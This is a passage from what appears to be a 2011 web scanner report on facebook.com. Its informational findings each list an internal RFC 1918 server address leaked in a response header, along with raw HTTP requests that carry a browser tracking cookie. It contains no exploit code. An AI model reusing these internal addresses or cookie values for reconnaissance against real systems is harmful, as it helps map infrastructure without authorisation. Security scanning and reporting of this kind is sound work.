GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1483%2C%22baseline_elapsed%22%3A1483%7D&asyncSignal=1556 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1ec8d2c74%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2517c53d%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.102.33
X-Cnection: close
Date: Thu, 16 Jun 2011 12:20:23 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.616. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.243.45

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1356%2C%22baseline_elapsed%22%3A1604%7D&asyncSignal=6723 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.243.45
X-Cnection: close
Date: Thu, 16 Jun 2011 13:43:01 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.617. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.143.104

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1236%2C%22baseline_elapsed%22%3A1187%7D&asyncSignal=6865 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df6daddc2c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff30c81b7ac%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.136.143.104
X-Cnection: close
Date: Thu, 16 Jun 2011 17:51:10 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.618. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.191.65

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1288%2C%22baseline_elapsed%22%3A1288%7D&asyncSignal=4922 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df12cc5175c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff32d786f84%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.191.65
X-Cnection: close
Date: Thu, 16 Jun 2011 16:33:37 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.619. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.94.41

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1292%2C%22baseline_elapsed%22%3A1196%7D&asyncSignal=8829 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df398326d08%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffef219d14%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.94.41
X-Cnection: close
Date: Thu, 16 Jun 2011 13:01:43 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.620. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.148.131

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1547%2C%22baseline_elapsed%22%3A2110%7D&asyncSignal=290 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.136.148.131
X-Cnection: close
Date: Thu, 16 Jun 2011 17:51:08 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.621. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.254.31

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1318%2C%22baseline_elapsed%22%3A1214%7D&asyncSignal=2043 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df15d47b8d4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff14a87b2b8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.254.31
X-Cnection: close
Date: Thu, 16 Jun 2011 17:20:12 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.622. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.82.49

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1150%2C%22baseline_elapsed%22%3A1723%7D&asyncSignal=7647 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df19998486c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a9bfff6%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.82.49
X-Cnection: close
Date: Thu, 16 Jun 2011 15:52:14 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.623. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.96.35

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1230%2C%22baseline_elapsed%22%3A1230%7D&asyncSignal=982 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3816cd8fc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2824c430%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.96.35
X-Cnection: close
Date: Thu, 16 Jun 2011 13:32:45 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.624. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.178.31

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1802%2C%22baseline_elapsed%22%3A1802%7D&asyncSignal=3181 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.178.31
X-Cnection: close
Date: Thu, 16 Jun 2011 16:33:34 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.625. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.69.28

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A2249%2C%22baseline_elapsed%22%3A2249%7D&asyncSignal=314 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.69.28
X-Cnection: close
Date: Thu, 16 Jun 2011 15:31:33 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.626. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.154.44

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2374db42c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffee63f02c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df981428b4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffee63f02c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df14d6b08%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df516d7998%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffee63f02c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df14d6b08&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2310cfa9%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffee63f02c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df14d6b08&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df10bd949d8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffee63f02c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df14d6b08&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.154.44
X-Cnection: close
Date: Thu, 16 Jun 2011 17:04:33 GMT
Content-Length: 22

Invalid Application ID

19.627. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.217.33

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1eb8c0fc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3774078cc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df350b04a5c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3774078cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13b0eff74%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1ec6c18a%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3774078cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13b0eff74&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df36a068a9c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3774078cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13b0eff74&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1d16bcff8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3774078cc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13b0eff74&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.217.33
X-Cnection: close
Date: Thu, 16 Jun 2011 17:45:56 GMT
Content-Length: 22

Invalid Application ID

19.628. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.191.37

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df382af0648%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2519325b4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df38177d794%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2519325b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd14ed018%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1e70061bc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2519325b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd14ed018&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3510f504%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2519325b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd14ed018&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3d6490dc4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2519325b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd14ed018&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.191.37
X-Cnection: close
Date: Thu, 16 Jun 2011 18:32:34 GMT
Content-Length: 22

Invalid Application ID

19.629. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.67.44

Request

